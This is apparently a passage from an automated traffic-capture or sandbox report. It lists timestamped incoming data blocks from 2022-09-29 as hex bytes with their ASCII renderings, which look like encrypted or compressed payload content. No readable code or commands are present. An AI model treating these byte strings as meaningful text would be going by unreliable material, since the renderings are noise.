                                                                                                                                                            2022-09-29 12:45:15 UTC19621INData Raw: 4a 48 92 a5 45 9a 4c a9 fb c6 b9 3a ef 09 7f c3 60 23 16 1d 6d ae c4 6d 12 b0 c4 65 95 29 67 6d 0e f6 92 d8 52 a3 d9 1a 8d bc 70 12 ec 89 83 a0 b6 eb d4 ba 54 27 95 2b ce 4f f6 f0 46 cb 8a 88 b6 c4 29 b3 ba 62 ff 66 c5 18 47 f5 de 14 da 4b 32 a5 c2 3b 54 70 63 80 db be d0 85 74 02 d3 ca 7e 1f 03 b3 9a 33 4e cc e2 d5 bb 7d 03 97 03 6f b2 b4 22 d7 28 6b 4f a7 a2 9b 52 08 80 ac f8 ed 02 da b5 32 2f 50 51 3e ac b7 7d 29 6f 95 d6 ad 59 d2 9c 6d 0d 72 b4 a6 df bd 76 a8 66 42 db 2d 37 24 0d 5a 4f f3 af d4 ed 89 73 76 aa 60 9b e2 15 82 85 d5 ff c9 f5 ab 61 f3 e6 9e bf 5c d2 d4 82 a5 07 16 f4 7e c6 66 16 15 24 70 45 48 90 2a 8e a7 51 54 3b 2a a7 13 0a eb af e6 02 55 b4 26 27 ab fe a7 2f 78 30 4a b9 32 aa 49 f7 c8 24 e5 52 43 e9 54 e4 d1 0f 96 96 7b cd 92 69 1b 0f
                                                                                                                                                            Data Ascii: JHEL:`#mme)gmRpT'+OF)bfGK2;Tpct~3N}o"(kOR2/PQ>})oYmrvfB-7$ZOsv`a\~f$pEH*QT;*U&'/x0J2I$RCT{i
                                                                                                                                                            2022-09-29 12:45:15 UTC19637INData Raw: 25 68 1c bc 40 59 12 58 4c 7f f8 0d 03 15 a3 df 59 0e c2 31 aa 54 f0 a2 2a 85 63 bd 1a 3f 71 21 26 69 fd 2a 3c dd 2d 82 6f 35 96 89 d5 22 5f 63 85 88 9e 2f b8 63 1d 19 78 2a 0d e1 58 4f 25 12 44 fa 2d 5e 1e 0a 21 d6 5c 9c 61 06 17 cb 7b 20 3a ca 76 c6 dc 04 43 d7 4f 76 d5 c9 3d a6 33 7f 6d 2a b8 c1 d2 69 cf a9 b6 7a 5d 39 f4 e3 3d d2 65 9e e1 22 a6 27 2c 50 e1 5a 88 33 4b ee ae 68 dd 4c 57 7b 43 e0 59 de 6d 01 4f 92 16 59 b0 89 f0 3e fd 2c fb df 47 45 43 4b 02 c5 23 32 52 14 7c dd 0b 30 fd a6 66 41 58 01 05 90 66 5c 57 84 a7 31 24 d7 eb 7e dd 63 62 c5 88 b9 43 24 3c a7 98 6b 1a 30 55 54 f3 e7 76 52 9d a4 29 dc 36 1b 35 56 e2 24 b9 9e 81 3a e0 0f 35 19 ba 40 dd df ae d6 2f 8f 08 21 fe fd 7a 18 17 9a 49 84 d1 a5 18 3c db 95 70 22 39 d8 90 f8 ee 8d 07 a3 03
                                                                                                                                                            Data Ascii: %h@YXLY1T*c?q!&i*<-o5"_c/cx*XO%D-^!\a{ :vCOv=3m*iz]9=e"',PZ3KhLW{CYmOY>,GECK#2R|0fAXf\W1$~cbC$<k0UTvR)65V$:5@/!zI<p"9
                                                                                                                                                            2022-09-29 12:45:15 UTC19653INData Raw: 9a 19 1f 3a dc e4 c1 a9 c6 1c 61 c5 df 13 00 60 60 4a 59 ec e3 a7 ac ca 41 6a fc 60 3f cd 70 50 1c db 56 a6 bc 28 83 15 79 86 66 38 fd de ff 17 51 47 4c f1 4c 80 5b e2 f2 28 d2 36 f8 c7 21 54 1d 34 79 db 33 e0 10 f0 f4 81 c4 ca 6d 87 b4 b6 ba d0 46 56 6c 22 20 23 35 b3 c2 1f 27 05 d7 c1 37 70 a7 f9 14 7e c5 6a 9e 6c ff 2e df 59 bb 4d 98 e6 20 a6 20 b5 93 72 44 bf 2a 98 03 89 5d c3 c0 b6 14 dc 40 44 b9 55 4d d8 7b 8c 82 fd ea 46 7b bb 81 eb 37 4f 60 bd aa 69 21 ed 74 4b dd 30 ba c0 65 cc 0f 7a e0 e4 9f 61 55 27 34 67 d6 83 48 bd 70 8d 8f 0e 07 cc 6d ac 4c 08 57 2f 61 5c 5d 7b 38 b0 82 87 3f ef 9d f6 f1 2d 05 b4 ef fb bd cb 87 ea c2 6c f9 b1 8c 15 a5 9b c3 66 ba 94 33 2a 78 bc 0b 1f 15 6a ca fb 97 c7 ad c7 00 5d 26 a2 11 75 ce 95 02 16 53 83 21 fe d2 e6 94
                                                                                                                                                            Data Ascii: :a``JYAj`?pPV(yf8QGLL[(6!T4y3mFVl" #5'7p~jl.YM rD*]@DUM{F{7O`i!tK0ezaU'4gHpmLW/a\]{8?-lf3*xj]&uS!
                                                                                                                                                            2022-09-29 12:45:15 UTC19669INData Raw: 61 80 12 42 d6 ef 6a ae b8 dd fb 62 55 f7 7e de 0d bc 79 32 f6 c6 63 6a a9 2d 6f 87 84 26 9d 1a 2e 86 56 ac 4e 3c 8c 99 ac 6b 8a e5 d8 6b 0e 81 2a 43 cb 99 56 73 48 52 ba c0 94 5d 05 0b 1f 49 7a 64 2b f6 a8 7c 35 b7 c0 44 8e 38 1f 55 86 4f 08 fb d5 f0 cf de 7e a4 ce 5b fb 97 5d 0d be ee 7c e1 bb 25 ab 10 cd 95 21 30 78 fb d5 8f d7 ab a8 fa 67 0d d3 77 5a e1 52 44 a8 65 53 56 c3 3a 52 1d aa db ef 40 a0 98 0e 26 8b 96 54 6a d3 14 e5 1f fa 5f 9f 1e 30 c1 fc a8 47 88 23 cc 24 ef a1 d4 af 21 44 55 af be 69 7c 89 7a f2 11 a1 f9 ea a2 a0 25 78 a4 8b 47 eb 9d 5e 6f 7f 1b 6e e4 98 9a 91 f8 c6 23 43 bc a9 4e 32 b6 26 b4 c4 23 67 9d db 16 a0 70 42 63 3d 35 0a 90 de 02 f6 6d 36 62 05 66 83 0e d4 71 ab 14 8a 67 48 fc f8 42 19 ef 1e 42 70 92 c2 06 fe d4 52 0d 81 4b c2
                                                                                                                                                            Data Ascii: aBjbU~y2cj-o&.VN<kk*CVsHR]Izd+|5D8UO~[]|%!0xgwZRDeSV:R@&Tj_0G#$!DUi|z%xG^on#CN2&#gpBc=5m6bfqgHBBpRK
                                                                                                                                                            2022-09-29 12:45:15 UTC19685INData Raw: 2a 94 87 83 0e 93 1e 0c 76 b7 c0 c7 2d 45 92 c4 27 9a d6 2d b2 0b 6b 0e fe 20 be 0e cb 9a cc 3a 45 c3 d3 67 57 0f ef f5 e7 d8 89 47 ae 02 f7 d4 23 b5 3c b4 6c 89 d0 a8 b1 0e c7 0b 91 a0 34 6a fb bc 21 40 e3 87 5a ca 03 f2 56 31 3e cd a9 30 fa 1d 7d e2 66 0e 9a 42 28 41 3d 35 25 a5 ea e7 e3 8f 5a 4a 15 13 e6 73 ac a5 53 3a be 0b 01 0e fb 6f 64 eb 11 b7 b0 c5 e8 57 88 7d 32 e6 ad 6a 8a fa 7d bc ee 96 84 59 d4 bc a8 d6 0d de 62 a5 c4 8c a6 a1 d8 f4 f8 81 25 a0 93 04 be 2d f2 21 ce cf 76 6a 76 f9 82 90 a9 95 3c 81 5f 18 e3 dd 2b 96 26 38 5e 9a 5e 42 07 5d 22 74 f0 2f aa 05 61 ee 38 65 44 d7 fa 74 c6 2d dd 1c 68 c3 3b 40 cd c4 69 65 92 9e e4 3d 52 7d 63 e1 09 7a d2 76 5e 01 9c bf 44 0c be 4e ae 94 ad 7c 7f a9 77 be 1c 01 5f 81 2e 20 17 0a ab e3 93 4c e4 2c 37
                                                                                                                                                            Data Ascii: *v-E'-k :EgWG#<l4j!@ZV1>0}fB(A=5%ZJsS:odW}2j}Yb%-!vjv<_+&8^^B]"t/a8eDt-h;@ie=R}czv^DN|w_. L,7
                                                                                                                                                            2022-09-29 12:45:15 UTC19701INData Raw: 12 39 6f c6 de e6 45 d7 f3 ce ae 9e f5 51 6e 95 90 0c 1c 02 cf b1 d6 dc ba 2e e4 60 c2 2e a5 6b 7f 2f 74 09 37 39 4a a4 6f 2f fd 7a 55 69 c3 72 fa b1 6f f0 06 81 05 37 48 63 7e ed 59 28 18 29 be 50 da 71 55 dd f6 9e 77 d4 b4 d9 5b af 53 73 13 e1 57 08 26 50 21 4b c4 4a 0b 6c b1 f4 bc 5d 51 43 38 fd ec f9 44 7b 36 12 fc 58 51 b7 d4 ce 5a d6 09 a3 ad 12 0a a5 ae f4 f0 2f ee 64 c5 bb 45 6d d6 8b e4 e9 6e 03 c2 5b 11 2d 5b d7 43 4e 71 cf 90 e2 af 22 48 ee 0b b2 f7 c7 93 e7 4b e8 31 7e 4b 6d 5d 32 f3 39 63 57 79 0a 2d 86 b3 56 a1 1d 36 72 c9 d9 11 f9 05 b4 cd e0 ca e4 76 85 17 2d 8f d9 63 c9 5f b5 64 e7 09 05 90 ce 8e 64 93 5e ca ed 5a 76 4c 7c 4e aa 9f f6 08 0a e3 3a f2 9e 50 3c c8 c2 fc 0e 14 61 82 ff 6a 95 35 13 1c d7 d8 4c c2 93 e7 57 7f f3 be 72 3b b9 6f
                                                                                                                                                            Data Ascii: 9oEQn.`.k/t79Jo/zUiro7Hc~Y()PqUw[SsW&P!KJl]QC8D{6XQZ/dEmn[-[CNq"HK1~Km]29cWy-V6rv-c_dd^ZvL|N:P<aj5LWr;o
                                                                                                                                                            2022-09-29 12:45:15 UTC19717INData Raw: 30 65 0a 38 a0 54 4a 83 b8 6c 38 5b 1f a1 81 8b 7e a2 80 53 03 06 59 84 29 81 e9 e5 89 e9 ce 87 58 d8 85 65 33 97 36 e6 4c ef 5f fb e2 44 7c c9 fd d1 2e f2 af 0b b2 75 3b 60 29 e4 11 a5 23 23 86 fe 4f 2c c4 c5 e3 f7 a2 fc 76 f0 5e 15 b0 3d be 07 31 9b a1 15 1f df 04 c5 23 26 80 9f ee 42 3b 9d d7 5a bf 04 a1 53 2a f4 8c e2 fc ae ca 0e 56 40 a3 69 e9 a2 d7 36 c3 17 26 83 2a 70 3a 02 f9 8a 8d e1 b5 d3 d4 74 67 42 d9 75 cb 68 34 72 e1 a2 53 ce 93 b4 d2 c8 1f 26 0c af 44 ff 1b bd ab a8 e9 0f db 6e 6e b7 5b 6d b6 63 22 16 8f f3 15 da 8a 8a b0 09 12 6b 10 58 8f ef 2d 25 df de 46 95 bd b3 3a 94 2a ec 1a 9b 21 22 76 1a bb d7 87 6e ec be ed 8c 87 0b 3a 18 f4 b2 f6 00 9e 22 13 ad be b8 83 c7 44 bf a0 73 cc 19 a5 a9 8b cd 3d 50 ec 88 fa cc f5 00 0e 82 19 93 39 ba 49
                                                                                                                                                            Data Ascii: 0e8TJl8[~SY)Xe36L_D|.u;`)##O,v^=1#&B;ZS*V@i6&*p:tgBuh4rS&Dnn[mc"kX-%F:*!"vn:"Ds=P9I
                                                                                                                                                            2022-09-29 12:45:15 UTC19733INData Raw: cf 5f 18 09 8e ef bb a5 8d 00 8b 1f 26 d0 85 f1 75 61 2b 5e 32 e3 98 a5 f7 7d 8b 04 4a 67 2c 46 2f 4f 4c 49 5a 1c cf 6e 05 5c 77 c5 79 3c 8d 11 06 76 24 39 d9 e0 33 ec b1 65 d4 19 11 da 4a 42 a9 a9 fc 5d 93 0c 08 7d 10 62 cc 03 ff df 86 96 9e d7 45 8d 9f b4 df 84 c6 2e 5e ee 8c d6 5f 39 0f 60 61 c1 c4 f5 de e9 d8 21 49 51 db f4 b5 4b a7 a0 7a b2 17 65 dd cc 1c 22 12 cf a3 4c 08 59 1d 3b 61 23 b7 57 55 fd 2c bc 94 e0 1c 6d 91 6c 79 0d f0 78 4f ed fb 15 27 24 6d e4 ce ef a3 4c 5c 0f ee 79 b1 77 37 a6 8c 6c 74 2e 8d 3d 34 a5 6a 4a 2c 6a b0 06 08 de 24 7c 98 16 65 1f c2 e8 e3 12 10 6f 84 91 d9 db c6 25 9e c2 7d ff fb cd 17 38 37 6b 1c 0c 93 20 d0 55 42 12 eb 4c df a1 7d a4 a4 45 29 4c d7 d2 28 ae b7 48 de 00 68 bb 66 85 b5 0e 30 6d b1 68 78 e1 96 50 87 e2 5c
                                                                                                                                                            Data Ascii: _&ua+^2}Jg,F/OLIZn\wy<v$93eJB]}bE.^_9`a!IQKze"LY;a#WU,mlyxO'$mL\yw7lt.=4jJ,j$|eo%}87k UBL}E)L(Hhf0mhxP\
                                                                                                                                                            2022-09-29 12:45:15 UTC19749INData Raw: 92 49 0b b2 6a ba 23 d2 b7 0f 46 b8 64 20 63 84 86 13 d2 1a 14 2d 11 f5 4b 10 9f 6b 37 0b 4b 85 87 d2 6d 3e 31 1d 1b a9 be db 0e e4 85 9b 49 c2 65 ce 9f 98 f6 3a 9a 7c f5 5a 9d 60 59 5d 27 04 f6 21 70 25 46 44 56 57 3d 06 72 e4 1e a5 84 3c 0f 29 65 df ef 41 26 63 2c 02 49 27 d4 1e c1 6d d3 e6 a7 e8 c9 58 83 4d a2 ef 98 8f ca 9d f2 62 3e af 46 0a 3a 3d 78 8d 4a 79 7e 47 74 b3 f8 4a 8e 6d ab 40 73 c6 8d e9 e9 7a 66 77 93 db 7d ea b6 f7 72 58 dc 72 89 64 7a 5c ff 8e 12 66 38 67 67 b0 f5 95 fb e3 6a f7 7c 82 bc f4 75 32 5e df 17 f7 54 42 bf 65 b1 b0 d3 71 b0 59 4f 45 a7 74 20 4a 8e c7 b7 0d 69 8c cb 16 a4 be 5c ad 99 76 d0 c9 e7 c7 cf f4 6a 1e eb ec 87 55 b3 15 f1 d6 bc de 7b f5 0a 08 b3 1d 2a d4 c4 31 5b 3c 6a e1 aa 44 b1 85 b7 c6 76 49 a9 db b0 d0 f1 ac e0
                                                                                                                                                            Data Ascii: Ij#Fd c-Kk7Km>1Ie:|Z`Y]'!p%FDVW=r<)eA&c,I'mXMb>F:=xJy~GtJm@szfw}rXrdz\f8ggj|u2^TBeqYOEt Ji\vjU{*1[<jDvI
                                                                                                                                                            2022-09-29 12:45:15 UTC19765INData Raw: 06 e7 b8 22 10 5b 47 2c 9e f5 8e b3 b5 97 73 45 ae f1 f9 5e 22 19 ec 1b 06 9a 0c ed 80 52 61 ec c4 a2 5b d5 ee fe e2 80 38 b1 a2 91 2d dc 10 ed 75 f2 8e 5f fe 6a 04 f0 4e 55 11 a6 6c a2 90 1e a0 08 fc f8 0d 90 2b 01 c0 72 a9 3b ad 0f c5 48 36 16 39 02 53 68 47 38 a9 83 f6 7e 16 22 4d 38 37 47 6c 4f 33 72 0b 1a e2 4f e1 ea 26 b6 da 63 1d 40 a6 33 31 ce 73 00 24 25 a9 1b db ca d0 34 00 fe 29 41 f7 8b d5 9c b0 9f 5e cd d4 a4 d6 73 c1 62 65 c9 55 ec 1d 53 b0 b7 07 9a 5c 65 84 45 c9 37 e0 35 7d cf a0 0a 01 fb 5e fe 61 c8 4c 0c a0 98 d4 d0 56 65 81 97 3f 65 26 18 c2 cd 53 c6 42 c6 e0 e5 ce 90 f4 5b f6 ef 64 3c 27 4e e9 a7 44 75 36 98 bf f4 1f 24 bd e5 bf 58 c6 e2 e3 63 4f ef bd b3 d8 a2 ed 96 57 db e3 63 05 14 80 7b ff b5 ad 99 be dd 01 92 7c 4e fc 79 e1 52 6a
                                                                                                                                                            Data Ascii: "[G,sE^"Ra[8-u_jNUl+r;H69ShG8~"M87GlO3rO&c@31s$%4)A^sbeUS\eE75}^aLVe?e&SB[d<'NDu6$XcOWc{|NyRj
                                                                                                                                                            2022-09-29 12:45:15 UTC19781INData Raw: 97 b8 ea 67 78 3e 29 59 50 a6 f9 d1 72 f0 c4 e7 9d 4f 43 81 ce f1 98 a3 c7 95 7f 68 a7 44 aa f0 54 53 94 88 d9 01 b3 12 88 1c ab f8 0f f6 17 91 43 6c b2 5c b9 2d c3 20 87 13 77 e1 cd 03 2a 29 13 b2 5c 79 41 83 2e 7d 44 80 18 2d 38 3f 68 02 1c ab da 4a c6 79 3c 0a c1 77 87 a8 65 67 f5 ad c6 c4 06 34 46 41 05 5a 2a d1 ae f3 97 f9 1e 0c 46 84 e5 4e c8 55 62 8d f7 b7 37 ee 43 41 d8 99 4d ea bd 0d c1 62 73 29 fe b4 7e 66 58 0d 8e 6e ad a2 29 f1 24 a2 e1 a8 4c ed 49 9a 18 71 60 30 0f 9f 5d 85 0b 25 40 ee 51 bc 09 92 cc 03 f5 f7 3e e4 90 67 ab 2e 29 03 bc 62 72 2e 17 6f 78 01 62 db b8 62 2a c9 18 21 77 59 46 9c 93 8f 96 00 bd 9b 6c be 4f 7e cd e7 10 88 34 6f 3e eb fa c8 23 e7 46 5a a3 08 e7 17 ec cc 77 dc 9b 4f 7a 69 88 38 bf c1 54 57 6f c3 06 8b 12 f1 99 ff 48
                                                                                                                                                            Data Ascii: gx>)YPrOChDTSCl\- w*)\yA.}D-8?hJy<weg4FAZ*FNUb7CAMbs)~fXn)$LIq`0]%@Q>g.)br.oxbb*!wYFlO~4o>#FZwOzi8TWoH
                                                                                                                                                            2022-09-29 12:45:15 UTC19797INData Raw: e1 67 70 c1 58 16 79 94 66 43 3c 16 68 78 ed 92 30 6b c3 03 cc 1f 66 5c 38 d6 55 35 78 09 c2 80 2d b5 99 f2 82 7c c4 16 5e 68 18 87 ad fa 39 a2 76 82 c0 7f 39 58 92 26 e9 83 ec f4 50 6c 5b 9c 33 90 b3 7a 45 a5 22 52 9f 14 e3 63 6c e9 8f 12 f2 7c 75 89 2a 2d a0 6a 41 98 6c d5 99 6b e1 96 fa 81 b8 09 4e ac 93 c0 03 49 e6 ad 8d 77 6c ee ff 22 41 7d 75 c7 ba 6c a0 7e e6 9e ae 13 80 c5 5d 8f d8 9d 49 ae e7 12 98 07 20 c2 bb 36 09 9d c2 62 33 cc 68 7f 57 05 c9 22 9b df c3 ce ba 4a 88 dc 69 a7 c0 1c 22 3a 14 4f f3 c9 ab 62 50 e6 b2 fc b3 63 b5 1f b1 d6 00 03 d4 be c3 26 7a 51 4a 6b 4f 3c 1a 65 16 fb 2a 05 73 0a 46 24 52 c3 81 fa d6 26 3a 79 ef 73 59 88 ff dd 13 dc ca 2f 38 e2 34 bf b0 e4 b4 ec 80 3b 25 d7 0e 59 81 81 8d c4 6e 87 cd 2f 00 1a e4 39 07 a9 76 ea 8a
                                                                                                                                                            Data Ascii: gpXyfC<hx0kf\8U5x-|^h9v9X&Pl[3zE"Rcl|u*-jAlkNIwl"A}ul~]I 6b3hW"Ji":ObPc&zQJkO<e*sF$R&:ysY/84;%Yn/9v
                                                                                                                                                            2022-09-29 12:45:15 UTC19813INData Raw: e3 87 4e 40 b3 99 da cc 09 76 1b 14 5c 82 9c a4 73 6d b9 14 f4 8e db 7d 70 2f f8 0f e6 eb a7 81 b1 a4 d9 dd 6e 71 c4 6a e4 ed 0c 0e c3 df d6 57 18 0a a8 28 36 8a a7 54 12 85 e9 5b 3c 65 88 cc 51 b6 bc 94 a9 1c 7e b2 1e 55 86 3a 77 d0 bf 26 df bc dc f7 a7 eb 9b 05 c5 17 db b4 fe 87 a0 28 81 97 cb 50 5c 4f 1b 44 95 b5 8f c8 8c 7d cf cd 93 0b a0 38 3f 21 89 ae 6f 80 d1 46 87 f6 2c 83 3b 11 44 74 53 16 24 3a 4b c0 31 68 ea 2c 15 82 cc f4 fb 46 5e 86 46 22 fa 49 e4 98 04 b0 11 2b 72 f2 19 6a e4 02 9b 2b ef 94 45 9f 48 48 77 9e 85 86 d2 8e a8 a3 a9 d3 11 5a c0 bd 1b ad 86 26 74 f0 c8 4a c8 09 12 1a b4 32 a1 f3 54 cd 97 83 d5 4c dd 29 1d 7e 93 90 c0 91 b3 b9 01 e0 4d 60 45 eb 14 64 0f eb 89 31 86 04 23 5e ab e9 56 61 7b 24 cd a8 eb 30 3f 0b 12 81 2d 0d 1a 03 28
                                                                                                                                                            Data Ascii: N@v\sm}p/nqjW(6T[<eQ~U:w&(P\OD}8?!oF,;DtS$:K1h,F^F"I+rj+EHHwZ&tJ2TL)~M`Ed1#^Va{$0?-(
                                                                                                                                                            2022-09-29 12:45:15 UTC19829INData Raw: 7e de 24 c8 9b 4a 8d 9e 26 55 1e 70 6e 5f de 3e b1 05 8b 0d 77 01 5d 70 03 89 91 1b dd 1d ed 0f f4 89 24 4c e9 e7 cc c8 12 c7 bb 60 59 c3 5e 9a 98 e6 b0 5a 30 52 94 69 62 54 68 53 7d d6 a9 6c 5a 46 b8 09 6b 37 ed 2b 94 6f b6 e2 ec 49 ec ac d4 ab eb c8 c5 51 7a 64 19 9d c7 6b 5a a1 11 58 36 b3 58 7c b1 f0 04 21 36 c5 61 70 c3 1d 16 5d 0a 04 46 5a 90 d1 9a d9 4f 7e 52 59 71 21 b3 03 69 c9 6c 57 7b 1e a4 02 e8 a5 dc 7e 0d e9 e2 ba 07 86 c6 6a ec d0 32 77 69 99 c6 d6 68 3f 39 e8 b5 4b 43 b1 0a bc 55 48 8c a5 07 73 7e 4b b5 ae 4e 68 40 3c 8e 93 90 33 08 63 e2 4e c9 67 52 14 ab bb b4 ac 92 7a 6f 50 40 d3 ad 4a 4f 03 74 73 2f 75 04 69 8b 3b a3 46 0a b2 c9 8d 2f aa 0e 06 d6 54 dc bb ad d1 42 93 f8 52 45 36 5e 09 78 14 3e 7d dd 62 9c b4 b4 9b b2 ba ad b0 c9 a1 e6
                                                                                                                                                            Data Ascii: ~$J&Upn_>w]p$L`Y^Z0RibThS}lZFk7+oIQzdkZX6X|!6ap]FZO~RYq!ilW{~j2wih?9KCUHs~KNh@<3cNgRzoP@JOts/ui;F/TBRE6^x>}b
                                                                                                                                                            2022-09-29 12:45:15 UTC19845INData Raw: 87 f5 87 49 be f9 a8 da 28 e1 1a d4 97 46 d1 bb 28 2c 1d 9f 47 5c b5 6a 28 07 18 71 04 bc 54 c0 3e 3d f1 a1 ab 0e e1 7a 7f 38 1e 4e 9b 1f 99 e6 d0 61 c1 ed 56 9c 9b db d8 57 bc 7f 77 6c 0d 9f 2b cc ae b6 7a 86 40 e6 63 0c 95 2a 02 65 0b 0d 82 40 f3 a5 41 60 5f 90 a5 23 9f 9e ef ee fd b5 52 a3 9e 6c 59 3e e9 d0 8e 38 db 3f e1 65 ee d5 dd 7c 99 b8 75 06 e7 72 b2 6a cc 95 9a 26 e3 b8 93 60 74 41 e7 fb 1a bc 2a 67 79 6f 90 df 3d b3 bc 31 59 c6 d8 d3 ee 66 e0 b4 ec e8 eb 0b b5 96 96 2f a0 ac 41 4a 11 93 1b 43 79 22 3d 15 6f 14 0a 28 2f 18 00 5f ba e4 d4 67 ad 39 9c 8d f6 91 00 4e 0c d8 96 29 53 d7 b6 17 91 ad 23 a3 34 68 b9 a8 ab a9 59 82 13 42 ca 2b 9f bf f9 03 41 66 93 5a e5 f4 e6 1c e1 54 e5 98 35 70 59 0b 20 4e 1e 07 22 0d a9 70 ed ff 7a 57 52 25 49 ac 78
                                                                                                                                                            Data Ascii: I(F(,G\j(qT>=z8NaVWwl+z@c*e@A`_#RlY>8?e|urj&`tA*gyo=1Yf/AJCy"=o(/_g9N)S#4hYB+AfZT5pY N"pzWR%Ix
                                                                                                                                                            2022-09-29 12:45:15 UTC19861INData Raw: 92 af 5f d3 3b e3 07 37 7b a1 3e ba ac 19 93 6b 2a 7b c5 20 f4 e2 7f f8 87 e2 43 f2 23 14 cb 8d 8a 91 04 0d af 68 92 3a 84 87 f7 13 11 cf 09 e6 f9 34 aa 34 22 bf 33 0a e6 5a cb 60 df 03 f3 30 91 9a 45 79 85 d5 eb fc d3 3f d1 42 76 6b 04 da 4f c6 2d cb c2 ee fb 1a 2e bd 6b 54 3f ad d8 ff 1e 40 c2 80 37 24 59 72 27 dd 1d 83 bd 4f 8e 98 7c 09 10 15 65 e0 f1 6d 2c fc 1d 9f 87 2f 0d c7 b0 29 42 74 e1 a2 ae c3 76 be c5 0c e7 a9 ec bc ea ed 19 3c 33 4a eb d3 9f e2 43 10 d8 0e a9 1a 69 32 46 b1 ce 13 ae 08 3a 91 57 82 f7 b3 45 36 5c b1 17 99 a2 04 ab 62 6a 71 13 88 06 c2 46 c4 83 cb 50 42 3d 48 47 45 f1 6d 6b 14 25 39 05 fb 6c e4 b1 7f 51 a9 34 a1 39 fb 2c db cf ce e5 a4 c5 ff 6c 4a 0e d2 52 68 c8 fd c0 2d 80 7b da 25 6f 79 ee a4 ad 69 a6 49 83 0a 87 be 46 43 55
                                                                                                                                                            Data Ascii: _;7{>k*{ C#h:44"3Z`0Ey?BvkO-.kT?@7$Yr'O|em,/)Btv<3JCi2F:WE6\bjqFPB=HGEmk%9lQ49,lJRh-{%oyiIFCU
                                                                                                                                                            2022-09-29 12:45:15 UTC19877INData Raw: 47 88 3a d0 f7 7b b8 54 16 ea 4a 85 de 8e 47 dc 3e 9b 19 3d 1d f4 b6 4b 88 49 2c fb 6d 93 c1 9d f4 0e ed 61 04 6e b1 c0 5a 40 70 09 1d 04 9a 87 ce b9 34 4f 3c b9 98 0d fe 3f 09 6b 8c e5 c6 5d 53 34 4b 78 66 88 44 97 c7 45 f1 40 81 e5 ab 6c b2 b2 29 81 e3 bb 76 fb ad 73 6b 4e fa e3 67 5a d8 d6 02 00 3c 25 55 e6 3d 25 72 ba 93 94 42 9f c8 ac af 66 de c1 33 8e 64 45 19 33 f5 14 b2 e1 29 41 67 18 43 d5 7a 5a 6f a1 99 f8 a8 45 a8 94 ba c1 44 3a dd 17 1b 4b 39 9a 9e 76 3e 39 82 d4 f6 a3 23 22 3a 2f 7c 72 2e 11 8e 75 6d 08 6b c7 0d 1a 2d ca 9d 3e 93 18 7f ec 80 bb 21 f7 9b 55 cf ff 03 07 88 f7 32 68 7a 1a 8a ce f7 55 61 d6 77 ac 20 5f 0b 5b 3e 41 56 2f ad 58 bc 30 05 b3 e5 6b 61 24 94 2d e0 3f 2e 8f 32 99 02 e3 6d 43 d0 a1 2c 2e 3a 4b c8 c0 87 52 c3 f7 5b 09 1e
                                                                                                                                                            Data Ascii: G:{TJG>=KI,manZ@p4O<?k]S4KxfDE@l)vskNgZ<%U=%rBf3dE3)AgCzZoED:K9v>9#":/|r.umk->!U2hzUaw _[>AV/X0ka$-?.2mC,.:KR[
                                                                                                                                                            2022-09-29 12:45:15 UTC19893INData Raw: af 77 1c fa 17 dc 21 cc 86 c9 1a 99 0e 89 de dd 57 88 56 4d 6d 15 47 b9 d5 3c cd b9 2d be ed 1a 44 6f 01 e9 fb 2d ca 95 4b 8b d1 f4 04 f7 b3 87 b2 db 7d 6a 8c 75 1a 17 79 90 2f f4 a6 11 33 65 b0 41 47 ec 7f d2 99 19 b4 54 0c e6 7f 73 c5 75 09 e6 42 11 08 b3 46 18 a8 1a 56 89 80 cf 25 e9 a7 a6 67 f1 7b 03 26 ec cb e8 b9 33 07 8d 1c 01 1e 94 5b ef ba 07 71 1f db c7 74 b7 37 af 31 62 8e 58 50 dc fb 16 01 a0 f0 82 14 92 68 1d 53 8d 21 da 64 1e 8a 9b d3 c3 81 00 d8 42 71 a6 2c c2 d2 cf 0d ca a2 57 09 da 99 7f 3f 8d 67 f9 a7 ec 1c 32 39 3d f6 82 cb 59 07 ba c1 d7 3f 56 5d a5 41 a2 72 67 bf c8 ad 03 36 35 f6 31 d6 85 e3 56 0e d1 92 42 44 10 15 98 0d 40 fb 0f 65 49 b8 1e 87 3a 08 e2 00 70 d6 6b 9d 6f 58 a2 b1 80 93 93 b0 ed b0 62 2c 0b 20 90 03 9d b4 d1 21 b3 72
                                                                                                                                                            Data Ascii: w!WVMmG<-Do-K}juy/3eAGTsuBFV%g{&3[qt71bXPhS!dBq,W?g29=Y?V]Arg651VBD@eI:pkoXb, !r
                                                                                                                                                            2022-09-29 12:45:15 UTC19909INData Raw: 2a 3f b0 e5 f2 d5 b0 c0 ab f3 b7 c1 4e da 84 95 36 1c 02 96 f6 30 b1 18 22 31 2b c3 72 b9 78 44 86 03 50 58 40 44 3a d5 6c 98 47 d6 35 6c 79 d9 65 ca 65 e5 5f fc 18 fe 29 2e c9 3a 80 d9 b9 76 56 5b d9 ce e7 93 fe 6f 58 ac 0c d4 80 f0 24 96 40 45 10 25 50 3d 58 88 b2 92 2e 8d 00 15 d7 13 58 d2 04 e5 c6 1d 55 fb 88 67 79 97 63 7b 1a df 7a 19 3d 2f 85 ce 94 09 f9 8c 3e 60 18 39 d8 4e 55 b2 b5 33 5c 9b 89 a5 c2 05 a3 76 29 28 f6 e5 43 f3 5c fb e6 d5 48 10 8b 55 d3 f0 5c eb 19 8e 5e c1 75 ac a8 ba ba a3 fe 44 e6 67 54 c9 d8 1e db eb 04 e1 9d cb d8 f8 4f bc fa 67 4c bf 07 19 6d ba 4b 35 0a 42 94 09 74 ca 84 e1 3a a9 f5 7e 44 ba 1c 98 45 24 cf 2d fa d6 9d 6e 5b 0c a9 a4 f4 02 c4 1c 8c df cd e7 91 7e 24 05 d2 8b 44 ac cc 0f a0 c7 5f 24 e4 be c0 75 7a e6 6a 64 2b
                                                                                                                                                            Data Ascii: *?N60"1+rxDPX@D:lG5lyee_).:vV[oX$@E%P=X.XUgyc{z=/>`9NU3\v)(C\HU\^uDgTOgLmK5Bt:~DE$-n[~$D_$uzjd+
